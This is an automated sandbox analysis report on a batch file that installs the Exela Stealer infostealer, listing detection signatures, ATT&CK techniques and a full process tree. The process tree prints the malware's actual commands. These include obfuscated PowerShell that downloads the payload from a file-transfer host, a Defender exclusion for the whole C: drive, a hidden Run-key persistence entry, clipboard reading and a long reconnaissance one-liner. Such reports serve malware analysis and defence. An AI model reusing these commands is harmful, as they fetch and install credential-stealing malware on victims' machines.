exelastealer | 6eba1ec75ca86382fddebdca5e2ac3c00e0793af58ff74b9e9042f7297cbb214

Analysis

max time kernel
147s
max time network
153s
platform
windows10-2004_x64
resource
win10v2004-20240426-en
resource tags

arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system
submitted
24-05-2024 13:50

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Bat Ayar.bat
Size

684B
MD5

26bfcd76c6d78dccdf22716f13087ec6
SHA1

07e02f656c097569c29f7d01e76632d0b90fd3d9
SHA256

6eba1ec75ca86382fddebdca5e2ac3c00e0793af58ff74b9e9042f7297cbb214
SHA512

0696ec540605451d7888840c9e59a4711a6585302f8f69a3c3032aba72c689ca087918fe1c4f96e6943689f5f21178be68711980db8eb19f12dfe29854bbfeb9

Score

10^/10

exelastealer evasion execution persistence pyinstaller spyware stealer upx

Malware Config

Signatures

Exela Stealer
Exela Stealer is an open source stealer originally written in .NET and later transitioned to Python that was first observed in August 2023.
stealer exelastealer
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098
Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

34 4156 powershell.exe
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.exe

pid process

3888 powershell.exe
4156 powershell.exe
Downloads MZ/PE file
Modifies Windows Firewall 2 TTPs 4 IoCs
evasion

Windows Service
T1543.003

Disable or Modify System Firewall
T1562.004

Processes:

netsh.exenetsh.exenetsh.exenetsh.exe

pid process

4992 netsh.exe
392 netsh.exe
4336 netsh.exe
2800 netsh.exe
Deletes itself 1 IoCs

Processes:

Discord.exe

pid process

2740 Discord.exe
Executes dropped EXE 4 IoCs

Processes:

Discord.exeDiscord.exeDiscord.exeDiscord.exe

pid process

5012 Discord.exe
2740 Discord.exe
4744 Discord.exe
4380 Discord.exe

flow	pid	process
34	4156	powershell.exe

pid	process
4992	netsh.exe
392	netsh.exe
4336	netsh.exe
2800	netsh.exe

pid	process
5012	Discord.exe
2740	Discord.exe
4744	Discord.exe
4380	Discord.exe

Loads dropped DLL 62 IoCs

Processes:

Discord.exeDiscord.exe

pid	process
2740	Discord.exe
2740	Discord.exe
2740	Discord.exe
2740	Discord.exe
2740	Discord.exe
2740	Discord.exe
2740	Discord.exe
2740	Discord.exe
2740	Discord.exe
2740	Discord.exe
2740	Discord.exe
2740	Discord.exe
2740	Discord.exe
2740	Discord.exe
2740	Discord.exe
2740	Discord.exe
2740	Discord.exe
2740	Discord.exe
2740	Discord.exe
2740	Discord.exe
2740	Discord.exe
2740	Discord.exe
2740	Discord.exe
2740	Discord.exe
2740	Discord.exe
2740	Discord.exe
2740	Discord.exe
2740	Discord.exe
2740	Discord.exe
2740	Discord.exe
2740	Discord.exe
4380	Discord.exe
4380	Discord.exe
4380	Discord.exe
4380	Discord.exe
4380	Discord.exe
4380	Discord.exe
4380	Discord.exe
4380	Discord.exe
4380	Discord.exe
4380	Discord.exe
4380	Discord.exe
4380	Discord.exe
4380	Discord.exe
4380	Discord.exe
4380	Discord.exe
4380	Discord.exe
4380	Discord.exe
4380	Discord.exe
4380	Discord.exe
4380	Discord.exe
4380	Discord.exe
4380	Discord.exe
4380	Discord.exe
4380	Discord.exe
4380	Discord.exe
4380	Discord.exe
4380	Discord.exe
4380	Discord.exe
4380	Discord.exe
4380	Discord.exe
4380	Discord.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

UPX packed file 64 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\_MEI50122\python310.dll	upx
behavioral2/memory/2740-93-0x00007FFBF3E60000-0x00007FFBF42CE000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\_MEI50122\_ctypes.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI50122\_socket.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI50122\select.pyd	upx
behavioral2/memory/2740-104-0x00007FFC0BC80000-0x00007FFC0BC8F000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\_MEI50122\_lzma.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI50122\sqlite3.dll	upx
C:\Users\Admin\AppData\Local\Temp\_MEI50122\_sqlite3.pyd	upx
behavioral2/memory/2740-121-0x00007FFBF3CE0000-0x00007FFBF3E51000-memory.dmp	upx
behavioral2/memory/2740-120-0x00007FFC02C10000-0x00007FFC02C2F000-memory.dmp	upx
behavioral2/memory/2740-119-0x00007FFC02C30000-0x00007FFC02C5D000-memory.dmp	upx
behavioral2/memory/2740-118-0x00007FFC02C60000-0x00007FFC02C79000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\_MEI50122\_bz2.pyd	upx
behavioral2/memory/2740-109-0x00007FFC032B0000-0x00007FFC032BD000-memory.dmp	upx
behavioral2/memory/2740-108-0x00007FFC035E0000-0x00007FFC035F9000-memory.dmp	upx
behavioral2/memory/2740-103-0x00007FFC02C80000-0x00007FFC02CA4000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\_MEI50122\libffi-7.dll	upx
C:\Users\Admin\AppData\Local\Temp\_MEI50122\_ssl.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI50122\libcrypto-1_1.dll	upx
C:\Users\Admin\AppData\Local\Temp\_MEI50122\libssl-1_1.dll	upx
behavioral2/memory/2740-125-0x00007FFC02BE0000-0x00007FFC02C0E000-memory.dmp	upx
behavioral2/memory/2740-131-0x00007FFBF2A40000-0x00007FFBF2DB5000-memory.dmp	upx
behavioral2/memory/2740-130-0x00007FFBF4EE0000-0x00007FFBF4F98000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\_MEI50122\_asyncio.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI50122\_overlapped.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI50122\multidict\_multidict.cp310-win_amd64.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI50122\_hashlib.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI50122\unicodedata.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI50122\yarl\_quoting_c.cp310-win_amd64.pyd	upx
behavioral2/memory/2740-150-0x00007FFC02A10000-0x00007FFC02A32000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\_MEI50122\aiohttp\_helpers.cp310-win_amd64.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI50122\aiohttp\_http_writer.cp310-win_amd64.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI50122\aiohttp\_websocket.cp310-win_amd64.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI50122\frozenlist\_frozenlist.cp310-win_amd64.pyd	upx
behavioral2/memory/2740-168-0x00007FFC028E0000-0x00007FFC028F7000-memory.dmp	upx
behavioral2/memory/2740-167-0x00007FFC00540000-0x00007FFC0055E000-memory.dmp	upx
behavioral2/memory/2740-166-0x00007FFC02B90000-0x00007FFC02B9A000-memory.dmp	upx
behavioral2/memory/2740-165-0x00007FFC00750000-0x00007FFC00761000-memory.dmp	upx
behavioral2/memory/2740-164-0x00007FFBF4E90000-0x00007FFBF4EDC000-memory.dmp	upx
behavioral2/memory/2740-163-0x00007FFC008D0000-0x00007FFC008E9000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\_MEI50122\_uuid.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI50122\aiohttp\_http_parser.cp310-win_amd64.pyd	upx
behavioral2/memory/2740-149-0x00007FFBF3BC0000-0x00007FFBF3CD8000-memory.dmp	upx
behavioral2/memory/2740-148-0x00007FFC02A40000-0x00007FFC02A54000-memory.dmp	upx
behavioral2/memory/2740-147-0x00007FFC02BA0000-0x00007FFC02BB4000-memory.dmp	upx
behavioral2/memory/2740-146-0x00007FFC030A0000-0x00007FFC030B0000-memory.dmp	upx
behavioral2/memory/2740-145-0x00007FFC02BC0000-0x00007FFC02BD5000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\_MEI50122\cryptography\hazmat\bindings\_rust.pyd	upx
behavioral2/memory/2740-171-0x00007FFBF2340000-0x00007FFBF2A34000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\_MEI50122\_cffi_backend.cp310-win_amd64.pyd	upx
behavioral2/memory/2740-174-0x00007FFBF4E50000-0x00007FFBF4E88000-memory.dmp	upx
behavioral2/memory/2740-173-0x00007FFBF3E60000-0x00007FFBF42CE000-memory.dmp	upx
behavioral2/memory/2740-216-0x00007FFC07CB0000-0x00007FFC07CBD000-memory.dmp	upx
behavioral2/memory/2740-231-0x00007FFC035E0000-0x00007FFC035F9000-memory.dmp	upx
behavioral2/memory/2740-233-0x00007FFBF3CE0000-0x00007FFBF3E51000-memory.dmp	upx
behavioral2/memory/2740-234-0x00007FFBF2A40000-0x00007FFBF2DB5000-memory.dmp	upx
behavioral2/memory/2740-232-0x00007FFC02C10000-0x00007FFC02C2F000-memory.dmp	upx
behavioral2/memory/2740-271-0x00007FFC02BE0000-0x00007FFC02C0E000-memory.dmp	upx
behavioral2/memory/2740-268-0x00007FFBF2340000-0x00007FFBF2A34000-memory.dmp	upx
behavioral2/memory/2740-264-0x00007FFBF4E90000-0x00007FFBF4EDC000-memory.dmp	upx
behavioral2/memory/2740-263-0x00007FFC008D0000-0x00007FFC008E9000-memory.dmp	upx
behavioral2/memory/2740-262-0x00007FFC028E0000-0x00007FFC028F7000-memory.dmp	upx
behavioral2/memory/2740-261-0x00007FFC02A10000-0x00007FFC02A32000-memory.dmp	upx

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

reg.exereg.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Exela Update Service = "C:\\Users\\Admin\\AppData\\Local\\ExelaUpdateService\\Exela.exe"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Exela Update Service = "C:\\Users\\Admin\\AppData\\Local\\ExelaUpdateService\\Exela.exe"	reg.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 11 IoCs

Web Service

T1102

Processes:

flow	ioc
105	discord.com
70	discord.com
74	discord.com
104	discord.com
75	discord.com
102	discord.com
103	discord.com
106	discord.com
71	discord.com
72	discord.com
73	discord.com

Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

66 ip-api.com
Launches sc.exe 2 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exe

pid process

2384 sc.exe
1468 sc.exe

flow	ioc
66	ip-api.com

pid	process
2384	sc.exe
1468	sc.exe

Detects Pyinstaller 1 IoCs

pyinstaller

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Anon\Discord.exe	pyinstaller

Collects information from the system 1 TTPs 2 IoCs
Uses WMIC.exe to find detailed system information.

Data from Local System
T1005

Processes:

WMIC.exeWMIC.exe

pid process

3304 WMIC.exe
4796 WMIC.exe
Enumerates processes with tasklist 1 TTPs 8 IoCs

Process Discovery
T1057

Processes:

tasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exe

pid process

3184 tasklist.exe
3048 tasklist.exe
4728 tasklist.exe
2400 tasklist.exe
5108 tasklist.exe
4348 tasklist.exe
4380 tasklist.exe
4304 tasklist.exe
Gathers network information 2 TTPs 4 IoCs
Uses commandline utility to view network configuration.

System Information Discovery
T1082

Command and Scripting Interpreter
T1059

Processes:

NETSTAT.EXEipconfig.exeNETSTAT.EXEipconfig.exe

pid process

3180 NETSTAT.EXE
3348 ipconfig.exe
1928 NETSTAT.EXE
3364 ipconfig.exe
Gathers system information 1 TTPs 2 IoCs
Runs systeminfo.exe.

System Information Discovery
T1082

Processes:

systeminfo.exesysteminfo.exe

pid process

2804 systeminfo.exe
4816 systeminfo.exe
Runs net.exe

pid	process
3304	WMIC.exe
4796	WMIC.exe

pid	process
3184	tasklist.exe
3048	tasklist.exe
4728	tasklist.exe
2400	tasklist.exe
5108	tasklist.exe
4348	tasklist.exe
4380	tasklist.exe
4304	tasklist.exe

pid	process
3180	NETSTAT.EXE
3348	ipconfig.exe
1928	NETSTAT.EXE
3364	ipconfig.exe

pid	process
2804	systeminfo.exe
4816	systeminfo.exe

Suspicious behavior: EnumeratesProcesses 10 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exe

pid	process
3888	powershell.exe
3888	powershell.exe
4156	powershell.exe
4156	powershell.exe
4284	powershell.exe
4284	powershell.exe
4284	powershell.exe
3988	powershell.exe
3988	powershell.exe
3988	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exepowershell.exetasklist.exeWMIC.exetasklist.exetasklist.exepowershell.exeWMIC.exe

description	pid	process
Token: SeDebugPrivilege	3888	powershell.exe
Token: SeDebugPrivilege	4156	powershell.exe
Token: SeDebugPrivilege	4380	tasklist.exe
Token: SeIncreaseQuotaPrivilege	3124	WMIC.exe
Token: SeSecurityPrivilege	3124	WMIC.exe
Token: SeTakeOwnershipPrivilege	3124	WMIC.exe
Token: SeLoadDriverPrivilege	3124	WMIC.exe
Token: SeSystemProfilePrivilege	3124	WMIC.exe
Token: SeSystemtimePrivilege	3124	WMIC.exe
Token: SeProfSingleProcessPrivilege	3124	WMIC.exe
Token: SeIncBasePriorityPrivilege	3124	WMIC.exe
Token: SeCreatePagefilePrivilege	3124	WMIC.exe
Token: SeBackupPrivilege	3124	WMIC.exe
Token: SeRestorePrivilege	3124	WMIC.exe
Token: SeShutdownPrivilege	3124	WMIC.exe
Token: SeDebugPrivilege	3124	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3124	WMIC.exe
Token: SeRemoteShutdownPrivilege	3124	WMIC.exe
Token: SeUndockPrivilege	3124	WMIC.exe
Token: SeManageVolumePrivilege	3124	WMIC.exe
Token: 33	3124	WMIC.exe
Token: 34	3124	WMIC.exe
Token: 35	3124	WMIC.exe
Token: 36	3124	WMIC.exe
Token: SeIncreaseQuotaPrivilege	3124	WMIC.exe
Token: SeSecurityPrivilege	3124	WMIC.exe
Token: SeTakeOwnershipPrivilege	3124	WMIC.exe
Token: SeLoadDriverPrivilege	3124	WMIC.exe
Token: SeSystemProfilePrivilege	3124	WMIC.exe
Token: SeSystemtimePrivilege	3124	WMIC.exe
Token: SeProfSingleProcessPrivilege	3124	WMIC.exe
Token: SeIncBasePriorityPrivilege	3124	WMIC.exe
Token: SeCreatePagefilePrivilege	3124	WMIC.exe
Token: SeBackupPrivilege	3124	WMIC.exe
Token: SeRestorePrivilege	3124	WMIC.exe
Token: SeShutdownPrivilege	3124	WMIC.exe
Token: SeDebugPrivilege	3124	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3124	WMIC.exe
Token: SeRemoteShutdownPrivilege	3124	WMIC.exe
Token: SeUndockPrivilege	3124	WMIC.exe
Token: SeManageVolumePrivilege	3124	WMIC.exe
Token: 33	3124	WMIC.exe
Token: 34	3124	WMIC.exe
Token: 35	3124	WMIC.exe
Token: 36	3124	WMIC.exe
Token: SeDebugPrivilege	4304	tasklist.exe
Token: SeDebugPrivilege	3184	tasklist.exe
Token: SeDebugPrivilege	4284	powershell.exe
Token: SeIncreaseQuotaPrivilege	4796	WMIC.exe
Token: SeSecurityPrivilege	4796	WMIC.exe
Token: SeTakeOwnershipPrivilege	4796	WMIC.exe
Token: SeLoadDriverPrivilege	4796	WMIC.exe
Token: SeSystemProfilePrivilege	4796	WMIC.exe
Token: SeSystemtimePrivilege	4796	WMIC.exe
Token: SeProfSingleProcessPrivilege	4796	WMIC.exe
Token: SeIncBasePriorityPrivilege	4796	WMIC.exe
Token: SeCreatePagefilePrivilege	4796	WMIC.exe
Token: SeBackupPrivilege	4796	WMIC.exe
Token: SeRestorePrivilege	4796	WMIC.exe
Token: SeShutdownPrivilege	4796	WMIC.exe
Token: SeDebugPrivilege	4796	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4796	WMIC.exe
Token: SeRemoteShutdownPrivilege	4796	WMIC.exe
Token: SeUndockPrivilege	4796	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

cmd.exeDiscord.exeDiscord.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exe

description	pid	process	target process
PID 3512 wrote to memory of 2756	3512	cmd.exe	curl.exe
PID 3512 wrote to memory of 2756	3512	cmd.exe	curl.exe
PID 3512 wrote to memory of 1104	3512	cmd.exe	cacls.exe
PID 3512 wrote to memory of 1104	3512	cmd.exe	cacls.exe
PID 3512 wrote to memory of 3888	3512	cmd.exe	powershell.exe
PID 3512 wrote to memory of 3888	3512	cmd.exe	powershell.exe
PID 3512 wrote to memory of 4156	3512	cmd.exe	powershell.exe
PID 3512 wrote to memory of 4156	3512	cmd.exe	powershell.exe
PID 3512 wrote to memory of 5012	3512	cmd.exe	Discord.exe
PID 3512 wrote to memory of 5012	3512	cmd.exe	Discord.exe
PID 5012 wrote to memory of 2740	5012	Discord.exe	Discord.exe
PID 5012 wrote to memory of 2740	5012	Discord.exe	Discord.exe
PID 2740 wrote to memory of 3348	2740	Discord.exe	cmd.exe
PID 2740 wrote to memory of 3348	2740	Discord.exe	cmd.exe
PID 2740 wrote to memory of 3896	2740	Discord.exe	cmd.exe
PID 2740 wrote to memory of 3896	2740	Discord.exe	cmd.exe
PID 2740 wrote to memory of 3888	2740	Discord.exe	cmd.exe
PID 2740 wrote to memory of 3888	2740	Discord.exe	cmd.exe
PID 3896 wrote to memory of 3124	3896	cmd.exe	WMIC.exe
PID 3896 wrote to memory of 3124	3896	cmd.exe	WMIC.exe
PID 3888 wrote to memory of 4380	3888	cmd.exe	tasklist.exe
PID 3888 wrote to memory of 4380	3888	cmd.exe	tasklist.exe
PID 2740 wrote to memory of 3992	2740	Discord.exe	cmd.exe
PID 2740 wrote to memory of 3992	2740	Discord.exe	cmd.exe
PID 3992 wrote to memory of 2744	3992	cmd.exe	attrib.exe
PID 3992 wrote to memory of 2744	3992	cmd.exe	attrib.exe
PID 2740 wrote to memory of 4820	2740	Discord.exe	cmd.exe
PID 2740 wrote to memory of 4820	2740	Discord.exe	cmd.exe
PID 4820 wrote to memory of 4308	4820	cmd.exe	reg.exe
PID 4820 wrote to memory of 4308	4820	cmd.exe	reg.exe
PID 2740 wrote to memory of 4796	2740	Discord.exe	cmd.exe
PID 2740 wrote to memory of 4796	2740	Discord.exe	cmd.exe
PID 4796 wrote to memory of 4304	4796	cmd.exe	tasklist.exe
PID 4796 wrote to memory of 4304	4796	cmd.exe	tasklist.exe
PID 2740 wrote to memory of 3048	2740	Discord.exe	cmd.exe
PID 2740 wrote to memory of 3048	2740	Discord.exe	cmd.exe
PID 2740 wrote to memory of 3652	2740	Discord.exe	cmd.exe
PID 2740 wrote to memory of 3652	2740	Discord.exe	cmd.exe
PID 2740 wrote to memory of 4808	2740	Discord.exe	cmd.exe
PID 2740 wrote to memory of 4808	2740	Discord.exe	cmd.exe
PID 2740 wrote to memory of 5084	2740	Discord.exe	cmd.exe
PID 2740 wrote to memory of 5084	2740	Discord.exe	cmd.exe
PID 3652 wrote to memory of 4744	3652	cmd.exe	cmd.exe
PID 3652 wrote to memory of 4744	3652	cmd.exe	cmd.exe
PID 3048 wrote to memory of 2852	3048	cmd.exe	cmd.exe
PID 3048 wrote to memory of 2852	3048	cmd.exe	cmd.exe
PID 4808 wrote to memory of 3184	4808	cmd.exe	tasklist.exe
PID 4808 wrote to memory of 3184	4808	cmd.exe	tasklist.exe
PID 2852 wrote to memory of 3696	2852	cmd.exe	chcp.com
PID 2852 wrote to memory of 3696	2852	cmd.exe	chcp.com
PID 4744 wrote to memory of 3128	4744	cmd.exe	chcp.com
PID 4744 wrote to memory of 3128	4744	cmd.exe	chcp.com
PID 5084 wrote to memory of 4284	5084	cmd.exe	powershell.exe
PID 5084 wrote to memory of 4284	5084	cmd.exe	powershell.exe
PID 2740 wrote to memory of 1600	2740	Discord.exe	cmd.exe
PID 2740 wrote to memory of 1600	2740	Discord.exe	cmd.exe
PID 2740 wrote to memory of 2080	2740	Discord.exe	cmd.exe
PID 2740 wrote to memory of 2080	2740	Discord.exe	cmd.exe
PID 1600 wrote to memory of 2804	1600	cmd.exe	systeminfo.exe
PID 1600 wrote to memory of 2804	1600	cmd.exe	systeminfo.exe
PID 2080 wrote to memory of 3124	2080	cmd.exe	netsh.exe
PID 2080 wrote to memory of 3124	2080	cmd.exe	netsh.exe
PID 1600 wrote to memory of 4304	1600	cmd.exe	HOSTNAME.EXE
PID 1600 wrote to memory of 4304	1600	cmd.exe	HOSTNAME.EXE

Views/modifies file attributes 1 TTPs 1 IoCs
evasion

Hidden Files and Directories
T1564.001

Processes:

attrib.exe

pid process

2744 attrib.exe

pid	process
2744	attrib.exe

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Bat Ayar.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:3512

C:\Windows\system32\curl.exe
curl --silent -o "C:\Users\Admin\AppData\Local\x.bat" "https://sw.lifeboxtransfer.com/v1/AUTH_LT_fc856d57-7abc-4ad2-ac90-950f9e675133/LT_8f72998e-f00f-4791-a5f6-69f9632a5810/807f63b2-f4f1-47e6-be8c-c81768b31a33/2241243d-65c3-489d-a4f1-8aab4534313a?temp_url_sig=8810de06efeeef271a4a696e3d87f4220a010c48c7eb331723b024c7526e7193&temp_url_expires=1716414925409&filename=x.bat"
2⤵
PID:2756

C:\Windows\system32\cacls.exe
"C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"
2⤵
PID:1104

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -w hidden -c A"d"d-MpP"r"efe"r"ence -ExclusionPath "C:\"
2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3888

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Powershell -Command "I"n"v"o"k"e"-W"e"b"r"e"q"u"e"st 'https://sw.lifeboxtransfer.com/v1/AUTH_LT_fc856d57-7abc-4ad2-ac90-950f9e675133/LT_8f72998e-f00f-4791-a5f6-69f9632a5810/da16ca16-b253-4073-9d27-a0f73970cb38/5706b294-04be-4fe4-b0d1-0faa703891f2?temp_url_sig=90553fd6b593455748cd8c42d5514517cb3bcda7c7cee3baa65de43cc7d47bed&temp_url_expires=1716414897486&filename=Exela.exe' -O"u"t"F"i"l"e Discord.exe"
2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4156

C:\Users\Admin\AppData\Local\Anon\Discord.exe
Discord.exe
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:5012

C:\Users\Admin\AppData\Local\Anon\Discord.exe
Discord.exe
3⤵
- Deletes itself
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2740

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "ver"
4⤵
PID:3348

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
4⤵
- Suspicious use of WriteProcessMemory
PID:3896

C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:3124

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist"
4⤵
- Suspicious use of WriteProcessMemory
PID:3888

C:\Windows\system32\tasklist.exe
tasklist
5⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:4380

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\ExelaUpdateService\Exela.exe""
4⤵
- Suspicious use of WriteProcessMemory
PID:3992

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\ExelaUpdateService\Exela.exe"
5⤵
- Views/modifies file attributes
PID:2744

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Exela Update Service" /t REG_SZ /d "C:\Users\Admin\AppData\Local\ExelaUpdateService\Exela.exe" /f"
4⤵
- Suspicious use of WriteProcessMemory
PID:4820

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Exela Update Service" /t REG_SZ /d "C:\Users\Admin\AppData\Local\ExelaUpdateService\Exela.exe" /f
5⤵
- Adds Run key to start application
PID:4308

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist"
4⤵
- Suspicious use of WriteProcessMemory
PID:4796

C:\Windows\system32\tasklist.exe
tasklist
5⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:4304

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "cmd.exe /c chcp"
4⤵
- Suspicious use of WriteProcessMemory
PID:3048

C:\Windows\system32\cmd.exe
cmd.exe /c chcp
5⤵
- Suspicious use of WriteProcessMemory
PID:2852

C:\Windows\system32\chcp.com
chcp
6⤵
PID:3696

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "cmd.exe /c chcp"
4⤵
- Suspicious use of WriteProcessMemory
PID:3652

C:\Windows\system32\cmd.exe
cmd.exe /c chcp
5⤵
- Suspicious use of WriteProcessMemory
PID:4744

C:\Windows\system32\chcp.com
chcp
6⤵
PID:3128

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
4⤵
- Suspicious use of WriteProcessMemory
PID:4808

C:\Windows\system32\tasklist.exe
tasklist /FO LIST
5⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:3184

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell.exe Get-Clipboard"
4⤵
- Suspicious use of WriteProcessMemory
PID:5084

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Get-Clipboard
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4284

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config"
4⤵
- Suspicious use of WriteProcessMemory
PID:1600

C:\Windows\system32\systeminfo.exe
systeminfo
5⤵
- Gathers system information
PID:2804

C:\Windows\system32\HOSTNAME.EXE
hostname
5⤵
PID:4304

C:\Windows\System32\Wbem\WMIC.exe
wmic logicaldisk get caption,description,providername
5⤵
- Collects information from the system
- Suspicious use of AdjustPrivilegeToken
PID:4796

C:\Windows\system32\net.exe
net user
5⤵
PID:888

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user
6⤵
PID:4172

C:\Windows\system32\query.exe
query user
5⤵
PID:1536

C:\Windows\system32\quser.exe
"C:\Windows\system32\quser.exe"
6⤵
PID:940

C:\Windows\system32\net.exe
net localgroup
5⤵
PID:1564

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 localgroup
6⤵
PID:5112

C:\Windows\system32\net.exe
net localgroup administrators
5⤵
PID:512

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 localgroup administrators
6⤵
PID:388

C:\Windows\system32\net.exe
net user guest
5⤵
PID:3836

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user guest
6⤵
PID:1920

C:\Windows\system32\net.exe
net user administrator
5⤵
PID:4588

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user administrator
6⤵
PID:2852

C:\Windows\System32\Wbem\WMIC.exe
wmic startup get caption,command
5⤵
PID:2424

C:\Windows\system32\tasklist.exe
tasklist /svc
5⤵
- Enumerates processes with tasklist
PID:3048

C:\Windows\system32\ipconfig.exe
ipconfig /all
5⤵
- Gathers network information
PID:3348

C:\Windows\system32\ROUTE.EXE
route print
5⤵
PID:3416

C:\Windows\system32\ARP.EXE
arp -a
5⤵
PID:4948

C:\Windows\system32\NETSTAT.EXE
netstat -ano
5⤵
- Gathers network information
PID:1928

C:\Windows\system32\sc.exe
sc query type= service state= all
5⤵
- Launches sc.exe
PID:2384

C:\Windows\system32\netsh.exe
netsh firewall show state
5⤵
- Modifies Windows Firewall
PID:4992

C:\Windows\system32\netsh.exe
netsh firewall show config
5⤵
- Modifies Windows Firewall
PID:392

C:\Windows\system32\cmd.exe
